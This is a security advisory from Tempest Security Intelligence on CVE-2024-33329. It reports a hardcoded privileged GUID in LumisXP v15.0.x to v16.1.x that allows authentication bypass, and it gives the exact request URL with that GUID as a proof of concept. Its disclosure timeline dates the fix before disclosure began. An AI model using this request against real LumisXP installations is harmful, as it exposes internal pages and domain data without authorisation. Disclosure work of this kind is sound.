LumisXP 16.1.x Hardcoded Credentials / IDOR

`=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================  
  
LumisXP v15.0.x to v16.1.x  
  
Author: Rodolfo Tavares  
  
Tempest Security Intelligence - Recife, Pernambuco - Brazil  
  
=====[ Table of Contents]==================================================  
  
Overview  
Detailed description  
Timeline of disclosure  
Thanks & Acknowledgements  
References  
=====[ Vulnerability  
Information]=============================================  
  
Class: Use of Hard-coded Credentials  
('Use of Hard-coded Credentials') [CWE-798]  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - 5.3  
=====[ Overview]========================================================  
  
System affected : LumisXP  
Software Version : Version - v15.0.x to v16.1.x  
Impacts :  
Vulnerability: A hardcoded privileged ID within Lumisxp v15.0.x to v16.1.x  
allows attackers to bypass authentication and access internal pages and  
other sensitive information  
=====[ Detailed  
description]=================================================  
  
IDOR  
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=  
:  
Access the link by inserting the GUID into the lumChannelId= parameter.  
1 - Access your target using the following GUID (  
00000000F00000000000000000000002 )  
```  
http://localhost.com/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=  
```  
2 - Verify that in the request response you will have access to various  
component information and internal information about one or several domains.  
  
=====[ Timeline of  
disclosure]===============================================  
  
2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
12/Apr/2024 - LumisXP Support confirmed the issue;  
16/Fev/2024 - The vendor fixed the vulnerability  
29/May/2024 - CVEs was assigned and reserved as CVE-2024-33329  
  
=====[ Thanks & Acknowledgements]========================================  
  
Tempest Security Intelligence [1]  
Rodolfo Tavares  
Niklas Correa  
=====[ References ]=====================================================  
  
[1][ https://cwe.mitre.org/data/definitions/798.html  
[2][ https://www.tempest.com.br]  
[3][Thanks Filipe X.]  
  
=====[ EOF ]===========================================================  
  
--  
  
--   
  
*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*  
  
*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*  
  
`